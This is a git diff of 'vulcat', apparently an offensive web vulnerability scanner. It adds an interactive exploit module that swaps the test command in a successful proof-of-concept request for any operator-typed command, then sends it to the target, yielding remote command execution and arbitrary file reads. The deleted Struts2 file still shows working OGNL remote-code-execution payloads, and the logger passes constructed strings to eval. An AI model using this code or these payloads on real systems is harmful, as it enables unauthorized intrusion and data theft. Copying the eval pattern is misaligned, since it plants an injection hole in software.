--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -12,14 +12,14 @@ def parse():
''' 参数列表 '''
lang = language() # * 帮助语言
- parser = OptionParser('''Usage: python3 vulcat.py
+ parser = OptionParser('\n' + lang['disclaimer'] + '''Usage: python3 vulcat.py
Examples:
python3 vulcat.py -u https://www.example.com/
python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.4\n')
+''', version='vulcat.py-1.1.5\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -50,6 +50,7 @@ def parse():
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
+ application.add_option('-x', '--exp', dest='exp', action='store_true', help=lang['application_help']['exp'])
# * 第三方api, 例如dnslog/ceye
api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name'])
diff --git a/lib/plugins/exploit.py b/lib/plugins/exploit.py
new file mode 100644
index 0000000..374c933
--- /dev/null
+++ b/lib/plugins/exploit.py
@@ -0,0 +1,310 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ 将POC转换为EXP
+'''
+
+from lib.initial.config import config
+from lib.tool.logger import logger
+from lib.report import output
+from thirdparty import HackRequests
+from urllib import parse as urllib_parse
+import re
+import socket
+
+class Exploit():
+ def __init__(self):
+ self.lang = config.get('lang')['exploit']
+ self.exp = config.get('exp')
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+ self.proxy = config.get('proxy')
+
+ self.rce_old_payload_re_list = [ # * RCE漏洞的旧command正则, 搜索并替换为用户自定义的新command
+ r'echo(\s|%20|\${IFS})?'\
+ '([0-9a-z]){6,8}',
+ r'cat(\s|%20)?'\
+ '(/|%2f|%2F)?'\
+ 'etc/(/|%2f|%2F)?passwd',
+ r'phpinfo\(?\)?',
+ r'print(\(|%28)\d{3,6}\*\d{3,6}(\)|%29)',
+ ]
+
+ self.fileread_old_payload_re_list = [
+ r'(/|%2f|%252f|%2F|%252F)?'\
+ 'etc(/|%2f|%252f|%2F|%252F)?passwd',
+ r'C:(/|%2f|%2F)?'\
+ 'Windows(/|%2f|%2F)?'\
+ 'System32(/|%2f|%2F)?'\
+ 'drivers(/|%2f|%2F)?'\
+ 'etc(/|%2f|%2F)?hosts',
+ r'C:(\\|%5c|%5C)?'\
+ 'Windows(\\|%5c|%5C)?'\
+ 'System32(\\|%5c|%5C)?'\
+ 'drivers(\\|%5c|%5C)?'\
+ 'etc(\\|%5c|%5C)?hosts',
+ ]
+
+ def start(self, results):
+ ''' 启动exp
+ # * 1. 判断有无Request
+ search_requests()
+ Request -> self.exp_raw() -> HackRequests.httpraw()
+
+ # * 2. 更新漏洞的Payload
+ search_command()
+ 接收用户输入的command
+ exit -> 退出Exploit模式
+ 其它命令 -> 查找旧command
+ 查找失败 -> 退出Exploit模式
+ 替换为新command -> 返回新的Request/Target
+
+ # * 3. 使用新Payload请求, 判断Exp请求是否成功
+ exp_request()
+ HackRequests.httpraw() / requests.get()
+ 请求失败 -> 返回第2步
+ 请求成功 -> 返回请求结果res
+
+ # * 4. 查找回显并显示
+ search_response()
+ 有回显and查找成功 -> 显示回显 -> 返回第2步
+ 查找失败 -> 返回第2步
+ :param results(list): vulcat返回的多个poc扫描结果
+ '''
+
+ # ! 遍历poc结果, 判断单个poc结果的漏洞类型, 分发给相应的漏洞Exp
+ for result in results:
+ if result and (re.search(r'rce', str(result['Type']), re.I)):
+ self.exploit(result, self.rce_old_payload_re_list)
+ elif result and (re.search(r'file-?read', str(result['Type']), re.I)):
+ self.exploit(result, self.fileread_old_payload_re_list)
+ elif result and (re.search(r'file-?include', str(result['Type']), re.I)):
+ self.exploit(result, self.fileread_old_payload_re_list)
+ # self.fileinclude(result, self.fileinclude_old_payload_re_list)
+ # elif result and ('sqlinject' in str(result['Type']).lower()):
+ # self.rce(result)
+ # elif result and ('ssrf' in str(result['Type']).lower()):
+ # self.rce(result)
+ else:
+ logger.info('yellow_ex', self.lang['not_exp'])
+
+
+ def exploit(self, result, re_list):
+ ''' 漏洞通用Exploit
+ :param result(dict): vulcat的单个poc扫描结果
+ '''
+ logger.info('red_ex', self.lang['identify'].format(result['Type'][1]))
+
+ http_raw = self.search_requests(result) # * 判断result是否带有Request请求包
+
+ if http_raw:
+ # * HackRequests.httpraw()
+ self.exp_raw(result, http_raw, re_list)
+ else:
+ logger.info('yellow_ex', self.lang['not_request']) # ? 日志, 没有Request, 无法使用Exp
+
+ def search_requests(self, result):
+ ''' 搜索一个result里面是否有返回Request
+ :param result(dict): vulcat的单个poc扫描结果
+ :return: 一个str形式的http数据包
+ '''
+
+ list_requests = [
+ 'Request',
+ # 'Request-1',
+ # 'Request-2',
+ # 'Request-3',
+ ]
+
+ for lr in list_requests:
+ if str(result.get(lr, '')):
+ res_info = output.output_vul_info(result, old_str='') # * 获取一个无颜色的http请求数据包
+ raw_start = res_info.find('[Request') + len('[Request')
+ raw_end = res_info.rfind(']', raw_start)
+ http_raw = res_info[raw_start:raw_end] # * 截取[Request 数据包 ]
+ return http_raw
+
+ return None
+
+ def search_command(self, re_list, old_payload):
+ ''' 搜索一个Request/Target中的旧payload, 替换为新payload并返回新的Request/Target
+ :param re_list(list): 旧payload的正则列表
+ :param old_payload(str): 要搜索的Request/Target
+ :return:
+ 新Request/Target
+ 是否退出exp模式
+ vcsearch字符串
+ '''
+ new_command = ''
+
+ # todo 输入自定义的命令, exit则退出Exploit模式
+ while not new_command:
+ try:
+ logger.info('red', '[Exploit] ', print_end='')
+ logger.info('reset', self.lang['input_command'], notime=True, print_end='') # ? 日志, 请输入command
+ new_command = input()
+
+ '''vulcat exp响应包内容搜索 (类似linux中的grep)
+ 可以搜索响应数据包中的内容, 正则表达式形式
+ '''
+ # todo 判断自定义命令中 是否有vulcat Exploit Response Search
+ vcsearch_re = r'\s*\|\s*vcsearch .*'
+ vc_str = re.search(vcsearch_re, new_command, re.I|re.M)
+ if vc_str:
+ vc_str = vc_str.group()
+ new_command = new_command.replace(vc_str, '') # * 去掉命令中的vcsearch语法
+
+ # * 只获取搜索的字符串
+ vc_start = vc_str.index('vcsearch ') + len('vcsearch ')
+ vc_str = vc_str[vc_start:]
+ vc_str = vc_str.strip('\'').strip('"')
+
+ if not new_command:
+ logger.info('yellow_ex', self.lang['not_command'], notime=True) # ? 日志, command不能为空
+ continue
+ elif new_command == 'exit':
+ return None, True, vc_str
+ except KeyboardInterrupt:
+ print()
+ return None, True, None
+
+ # todo 将数据包中的Content-Length: xxx去掉, 否则会影响HackRequests
+ is_contentLength = re.search(r'Content-Length: \d{1,9999}\r?\n{1}', old_payload, re.I|re.M)
+ if is_contentLength:
+ old_payload = old_payload.replace(is_contentLength.group(0), '')
+
+
+ # todo 遍历正则列表, 查找旧的command, 替换为新的command并返回
+ for rl in re_list:
+ is_command = re.search(rl, old_payload, re.M|re.S)
+ if is_command:
+ old_command = is_command.group(0)
+ if ('%20' in old_command): # * RCE的空格
+ new_command = self.url_encode(new_command, 1) # * 1次url编码, 默认编码
+ elif (re.search(r'(%2f|%2F)', old_command, re.M|re.S)): # * FileRead的/
+ new_command = self.url_encode(new_command, 1, 'utf-8') # * 1次url编码, utf-8
+ elif (re.search(r'(%252f|%252F)', old_command, re.M|re.S)): # * FileRead的/
+ new_command = self.url_encode(new_command, 2, 'utf-8') # * 2次url编码, utf-8
+ elif (re.search(r'\$\{IFS\}', old_command, re.M|re.S)): # * Nexus命令执行的空格
+ new_command = new_command.replace(' ', '${IFS}') # * 替换空格为Linux下的${IFS}
+
+ new_payload = old_payload.replace(old_command, new_command)
+
+ return new_payload, False, vc_str
+
+ logger.info('yellow_ex', self.lang['not_search_command'])
+ return None, True, vc_str
+
+ def url_encode(self, src_str, num, code=None):
+ dst_str = src_str
+
+ for i in range(num):
+ if code:
+ dst_str = urllib_parse.quote(dst_str, code)
+ else:
+ dst_str = urllib_parse.quote(dst_str)
+
+ return dst_str
+
+ def search_response(self, vc_str, res_response):
+ ''' 搜索一个Response里面是否有正确的回显
+ :param res_re(str): 要查找的Response正则
+ :param res_text(str): requests的响应包内容Response.text
+ :return: None
+ '''
+
+ try:
+ # * 是否使用vcsearch搜索Response.text的内容
+ if not vc_str:
+ print('====================Response====================')
+ print(res_response)
+ print('====================Response====================')
+ else:
+ r = re.compile(vc_str, re.I|re.M|re.S) # * 根据用户输入的正则, 新建一个正则对象r
+ vc_text_list = r.findall(res_response) # * 使用正则对象r, 匹配Response.text中的内容
+
+ if vc_text_list:
+ print('====================Response-vcsearch====================')
+ for vc_text in vc_text_list:
+ print(vc_text, end='\n\n')
+ print('====================Response-vcsearch====================')
+ else:
+ print(self.lang['not_response']) # ? 日志, 没有匹配到响应内容
+ except re.error:
+ print(self.lang['re_error']) # ? 日志, 正则表达式输入有误
+
+ def exp_request(self, result, http_raw, is_ssl=False):
+ ''' 通用请求
+ :param result(dict): vulcat的单个poc扫描结果
+ :param http_raw(str): poc返回的http请求包
+ :is_ssl: http请求包是否使用HTTPS
+ True -> HTTPS
+ False -> HTTP
+ :return: requests.Request
+ '''
+ vul_info = {}
+ vul_info['app_name'] = result['Type'][0] + '(Exploit)'
+ vul_info['vul_type'] = 'Exploit-' + result['Type'][1]
+ vul_info['vul_id'] = result['Type'][2]
+
+ if 'https' in result['Target']:
+ is_ssl = True
+
+ try:
+ hack = HackRequests.hackRequests()
+
+ res = hack.httpraw(
+ http_raw,
+ ssl=is_ssl,
+ proxy=self.proxy,
+ location=False
+ )
+
+ res.method = 'Exploit'
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ return res
+ except socket.timeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except ConnectionRefusedError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ def exp_raw(self, result, http_raw, re_list):
+ ''' 使用http数据包(Request)进行exp
+ while
+ if is_exit 是否退出Exploit模式
+ if new_http_raw 是否成功更新了payload
+ 是 -> 发起请求
+ 否 -> 更新payload失败
+ if res 是否请求成功
+ 是 -> 查找/显示Response内容
+ 否 -> exp请求失败
+
+ :param result: vulcat返回的单个poc扫描结果
+ :param http_raw: HTTP请求数据包
+ '''
+ while True:
+ new_http_raw, is_exit, vc_str = self.search_command(re_list, http_raw)
+
+ if is_exit:
+ logger.info('cyan_ex', self.lang['exit']) # ? 日志, 退出Exp模式
+ break
+
+ if new_http_raw:
+ res = self.exp_request(result, new_http_raw)
+
+ if res:
+ self.search_response(vc_str, str(res.header) + res.text())
+ else:
+ logger.info('red', self.lang['exp_faild']) # ? 日志, exp请求失败
+ else:
+ logger.info('red_ex', self.lang['faild_command']) # ? 日志, 更新payload失败
+
+exploit = Exploit()
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 60ea11a..d830fbe 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -549,6 +549,16 @@ def __init__(self):
r'"timestamp":.*"status":404',
]
},
+ {
+ 'name': 'supervisor',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'Supervisor \d\.\d\.\d'
+ ]
+ },
{
'name': 'thinkphp',
'path': '',
diff --git a/lib/report/output.py b/lib/report/output.py
index d5016b0..be4c819 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -7,19 +7,14 @@
from lib.tool.logger import logger
from thirdparty import requests
from thirdparty import HackRequests
-# from lib.plugins.Exp import exp
import json
import http.client
def output_info(results, lang):
- # cmd = config.get('command')
-
logger.info('cyan_ex', lang['output']['info']['wait']) # ? 日志, 正在处理扫描结果
results_info_list = []
for result in results:
- # if (result and cmd):
- # exp(result)
if result:
results_info = ''
results_info += output_vul_info_color(result)
@@ -135,8 +130,11 @@ def output_vul_info_color(result):
return result_info
-def output_vul_info(result):
- ''' 漏洞信息, 无颜色, 用于保存结果至文件中 '''
+def output_vul_info(result, old_str='\n'):
+ ''' 漏洞信息, 无颜色, 用于保存结果至文件中
+ :param result: vulcat的单个poc扫描结果
+ :param old_str: 适配Exploit模式, 其它情况下不用理会
+ '''
result_info = '\n'
for key, value in result.items():
value_type = type(value)
@@ -153,7 +151,7 @@ def output_vul_info(result):
result_info += output_res(key, value, iscolor=False)
elif value_type == HackRequests.response:
- result_info += output_Hackres(key, value, iscolor=False)
+ result_info += output_Hackres(key, value, iscolor=False, old_str=old_str)
return result_info
@@ -258,8 +256,14 @@ def output_res(key, res, iscolor=True):
return info_res
-def output_Hackres(key, res, iscolor=True):
- ''' 接收一个HackRequests结果, 返回一个http数据包 '''
+def output_Hackres(key, res, iscolor=True, old_str='\n'):
+ ''' 接收一个HackRequests结果, 返回一个http数据包
+ :param key: 字典key值
+ :param res: HackRequests.Response
+ :param iscolor: 颜色
+ :param rep: 用来适配Exploit模式, exp不能使用带换行的
+ :return: 带颜色/无颜色的http请求数据包
+ '''
info_res = ''
if iscolor:
@@ -276,7 +280,7 @@ def output_Hackres(key, res, iscolor=True):
try:
info_res += key + ':'
info_res += ' [Request'
- info_res += '\n' + res.log.get('request').replace('\n', '')
+ info_res += '\n' + res.log.get('request').replace(old_str, '')
info_res += ']\n '
except:
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index bf12b95..21b639a 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -12,8 +12,15 @@ def __init__(self):
self.requests_number = 0 # * http请求计数
def info(self, text_color, text, notime=False, print_end='\n'):
+ ''' 输出日志信息
+ :param text_color: 文本颜色
+ :param text: 文本
+ :param notime: 不显示时间[xx:xx:xx]
+ :param print_end: 结尾字符
+ '''
+
text = text.replace('\\', '\\\\') # * 防止eval时字符被转义
- command = 'color.{}("{}")'.format(text_color, text) # * 颜色 + 文字
+ command = 'color.{}("""{}""")'.format(text_color, text) # * 颜色 + 文字
now_time = '' if notime else nowtime() # * 是否显示时间
tqdm.write(now_time + eval(command), end=print_end)
@@ -32,14 +39,19 @@ def logging_0(self, *args):
pass
def logging_1(self, *args):
- ''' 功能尚未完成, 还在写 '''
+ ''' 默认为1, 正常输出信息 '''
pass
def logging_2(self, vul_info, status_code, *args):
''' 日志2级, 框架名称+状态码+漏洞编号'''
- info_2 = color.red_ex('[LOG-{}-{}]'.format(str(self.requests_number), vul_info['app_name']))
- info_2 += color.red_ex(' [') + color.magenta_ex(str(status_code)) + color.red_ex(']')
- info_2 += color.red_ex(' [') + color.black_ex(vul_info['vul_id']) + color.red_ex(']')
+ info_2 = ''
+
+ try:
+ info_2 = color.red_ex('[LOG-{}-{}]'.format(str(self.requests_number), vul_info['app_name']))
+ info_2 += color.red_ex(' [') + color.magenta_ex(str(status_code)) + color.red_ex(']')
+ info_2 += color.red_ex(' [') + color.black_ex(vul_info['vul_id']) + color.red_ex(']')
+ except:
+ return info_2
return info_2
@@ -49,9 +61,9 @@ def logging_3(self, vul_info, status_code, res):
try:
# * HackRequests
- if (str(type(res)) == ""):
+ if ('HackRequests.response' in str(type(res))):
info_3 += color.red_ex(' [' + res.method + ' ')
- info_3 +=color.black_ex(res.url) + color.red_ex(']')
+ info_3 += color.black_ex(res.url.replace('\r', '')) + color.red_ex(']')
if vul_info['data']:
info_3 += color.red_ex(' [DATA ') + color.black_ex(vul_info['data']) + color.red_ex(']')
return info_3
@@ -72,7 +84,7 @@ def logging_4(self, vul_info, status_code, res):
try:
# * HackRequests
- if (str(type(res)) == ""):
+ if ('HackRequests.response' in str(type(res))):
info_4 += color.red_ex(' [Request')
info_4 += color.black_ex('\n' + res.log.get('request'))
@@ -115,18 +127,18 @@ def logging_5(self, vul_info, status_code, res):
def logging_6(self, vul_info, status_code, res):
''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 '''
- res.encoding = 'utf-8'
info_6 = self.logging_5(vul_info, status_code, res)
try:
# * HackRequests
- if (str(type(res)) == ""):
+ if ('HackRequests.response' in str(type(res))):
info_6 = info_6[:-1]
info_6 += color.black_ex('\n\n' + res.text())
info_6 += color.red_ex('\n]')
# * requests
else:
+ res.encoding = 'utf-8'
info_6 = info_6[:-1]
info_6 += color.black_ex('\n\n' + res.text)
diff --git a/lib/tool/md5.py b/lib/tool/md5.py
index df7fe96..de74319 100644
--- a/lib/tool/md5.py
+++ b/lib/tool/md5.py
@@ -2,8 +2,7 @@
# -*- coding:utf-8 -*-
'''
- 获取md5值, 取前6位
- 获取随机的md5值, 取前8位
+ md5
'''
import hashlib
@@ -23,14 +22,43 @@ def random_md5():
return md.hexdigest()[:8]
-def random_int_1():
- ''' 返回1个随机整数, 范围1234-5678 '''
- num1 = random.randint(1234, 5678)
+def random_int_1(len = 4):
+ ''' 返回1个随机整数, 默认范围1234-5678
+ @param len
+ 随机数长度, 默认为4, 最小为1, 最大为6
+ 范围
+ 1-9
+ 10-99
+ 100-999
+ 1234-5678
+ 12345-56789
+ 123456-567890
+ '''
+
+ num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456]
+ num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890]
+
+ num1 = random.randint(num_list_1[len], num_list_2[len])
+
return num1
-def random_int_2():
- ''' 返回2个随机整数, 范围1234-5678 '''
- num1 = random.randint(1234, 5678)
- num2 = random.randint(1234, 5678)
+def random_int_2(len = 4):
+ ''' 返回2个随机整数, 默认范围1234-5678
+ @param len
+ 随机数长度, 默认为4, 最小为1, 最大为6
+ 范围
+ 1-9
+ 10-99
+ 100-999
+ 1234-5678
+ 12345-56789
+ 123456-567890
+ '''
+
+ num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456]
+ num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890]
+
+ num1 = random.randint(num_list_1[len], num_list_2[len])
+ num2 = random.randint(num_list_1[len], num_list_2[len])
return num1, num2
\ No newline at end of file
diff --git a/payloads/ApacheAirflow.py b/payloads/ApacheAirflow.py
index f951a70..a7e2aab 100644
--- a/payloads/ApacheAirflow.py
+++ b/payloads/ApacheAirflow.py
@@ -130,7 +130,10 @@ def cve_2020_17526_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ((verify_res.status_code == 200) and (('Schedule' in verify_res.text) or ('Recent Tasks' in verify_res.text))):
+ if ((verify_res.status_code == 200)
+ and (('Schedule' in verify_res.text)
+ or ('Recent Tasks' in verify_res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/ApacheFlink.py b/payloads/ApacheFlink.py
index db6f4b7..f0b3dc7 100644
--- a/payloads/ApacheFlink.py
+++ b/payloads/ApacheFlink.py
@@ -15,6 +15,7 @@
from lib.tool.thread import thread
from lib.tool import check
from thirdparty import requests
+import re
class Flink():
def __init__(self):
@@ -79,7 +80,10 @@ def cve_2020_17519_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -87,7 +91,8 @@ def cve_2020_17519_scan(self, url):
'Method': vul_info['vul_method'],
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/ApacheHttpd.py b/payloads/ApacheHttpd.py
index 97a33b1..0ba0dd7 100644
--- a/payloads/ApacheHttpd.py
+++ b/payloads/ApacheHttpd.py
@@ -31,6 +31,7 @@
from thirdparty import requests
from thirdparty import HackRequests
from time import sleep
+import re
class ApacheHttpd():
def __init__(self):
@@ -173,7 +174,7 @@ def cve_2021_41773_scan(self, url):
'''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_type'] = 'RCE/FileRead'
vul_info['vul_id'] = 'CVE-2021-41773'
# vul_info['vul_method'] = 'GET/POST'
vul_info['headers'] = {}
@@ -225,10 +226,9 @@ def cve_2021_41773_scan(self, url):
return None
if ((self.md in check.check_res(res.text, self.md))
- or ('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
@@ -241,7 +241,7 @@ def cve_2021_42013_scan(self, url):
''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ '''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_type'] = 'RCE/FileRead'
vul_info['vul_id'] = 'CVE-2021-42013'
# vul_info['vul_method'] = 'GET/POST'
vul_info['headers'] = {}
@@ -289,10 +289,9 @@ def cve_2021_42013_scan(self, url):
return None
if ((self.md in check.check_res(res.text(), self.md))
- or ('/sbin/nologin' in res.text())
- or ('root:x:0:0:root' in res.text())
- or ('Microsoft Corp' in res.text())
- or ('Microsoft TCP/IP for Windows' in res.text())
+ or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text(), re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text())
+ and ('Microsoft TCP/IP for Windows' in res.text()))
):
results = {
'Target': target,
diff --git a/payloads/ApacheSolr.py b/payloads/ApacheSolr.py
index 08a3f58..fa858fd 100644
--- a/payloads/ApacheSolr.py
+++ b/payloads/ApacheSolr.py
@@ -162,7 +162,7 @@ def cve_2021_27905_scan(self, url):
''' 当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取 '''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'SSRF'
+ vul_info['vul_type'] = 'SSRF/FileRead'
vul_info['vul_id'] = 'CVE-2021-27905'
vul_info['vul_method'] = 'GET/POST'
vul_info['headers'] = {
@@ -206,11 +206,14 @@ def cve_2021_27905_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/ApacheStruts2.py b/payloads/ApacheStruts2.py
deleted file mode 100644
index 5f2e752..0000000
--- a/payloads/ApacheStruts2.py
+++ /dev/null
@@ -1,445 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
- ApacheStruts2扫描类:
- Struts2 远程代码执行
- S2-001
- Payload: https://vulhub.org/#/environments/struts2/s2-001/
- S2-005
- Payload: https://blog.csdn.net/mole_exp/article/details/122550317
- S2-007
- Payload: https://vulhub.org/#/environments/struts2/s2-007/
- S2-008
- Payload: https://www.cnblogs.com/peace-and-romance/p/15630627.html
- S2-009
- Payload: https://www.cnblogs.com/Feng-L/p/13644828.html
- S2-012(CVE-2013-1965)
- Payload:
-
- S2-059
- Payload: https://www.h5w3.com/199714.html
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-from lib.initial.config import config
-from lib.tool.md5 import md5
-from lib.tool.logger import logger
-from lib.tool.thread import thread
-from lib.tool import check
-from thirdparty import requests
-
-class Struts2():
- def __init__(self):
- self.timeout = config.get('timeout')
- self.headers = config.get('headers')
- self.proxies = config.get('proxies')
-
- self.app_name = 'ApacheStruts2'
- self.md = md5(self.app_name)
- self.cmd = 'echo ' + self.md
-
- self.s2_001_payloads = [
- {
- 'path': 'login.action',
- 'data': 'username=admin&password=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md)
- },
- {
- 'path': '',
- 'data': 'username=admin&password=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md)
- },
- ]
-
- self.s2_005_payloads = [
- {
- 'path': 'example/HelloWorld.action?(a)(%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue)&(b)(%5cu0023context[\'xwork.MethodAccessor.denyMethodExecution\']%5cu003dfalse)&(c)(%5cu0023ret%5cu003d@java.lang.Runtime@getRuntime().exec(\'echo%20{}\'))&(d)(%5cu0023dis%5cu003dnew%5cu0020java.io.BufferedReader(new%5cu0020java.io.InputStreamReader(%5cu0023ret.getInputStream())))&(e)(%5cu0023res%5cu003dnew%5cu0020char[20000])&(f)(%5cu0023dis.read(%5cu0023res))&(g)(%5cu0023writer%5cu003d@org.apache.struts2.ServletActionContext@getResponse().getWriter())&(h)(%5cu0023writer.println(new%5cu0020java.lang.String(%5cu0023res)))&(i)(%5cu0023writer.flush())&(j)(%5cu0023writer.close())'.format(self.md),
- 'data': ''
- },
- {
- 'path': '?(a)(%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue)&(b)(%5cu0023context[\'xwork.MethodAccessor.denyMethodExecution\']%5cu003dfalse)&(c)(%5cu0023ret%5cu003d@java.lang.Runtime@getRuntime().exec(\'echo%20{}\'))&(d)(%5cu0023dis%5cu003dnew%5cu0020java.io.BufferedReader(new%5cu0020java.io.InputStreamReader(%5cu0023ret.getInputStream())))&(e)(%5cu0023res%5cu003dnew%5cu0020char[20000])&(f)(%5cu0023dis.read(%5cu0023res))&(g)(%5cu0023writer%5cu003d@org.apache.struts2.ServletActionContext@getResponse().getWriter())&(h)(%5cu0023writer.println(new%5cu0020java.lang.String(%5cu0023res)))&(i)(%5cu0023writer.flush())&(j)(%5cu0023writer.close())'.format(self.md),
- 'data': ''
- }
- ]
-
- self.s2_007_payloads = [
- {
- 'path': 'user.action?name=cat&email=jerry@mouse.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27echo%20{}%27).getInputStream()))%20%2B%20%27'.format(self.md),
- 'data': ''
- },
- {
- 'path': '?name=cat&email=jerry@mouse.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27echo%20{}%27).getInputStream()))%20%2B%20%27'.format(self.md),
- 'data': ''
- }
- ]
-
- self.s2_008_payloads = [
- {
- 'path': 'devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22echo%20{}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()'.format(self.md),
- 'data': ''
- },
- {
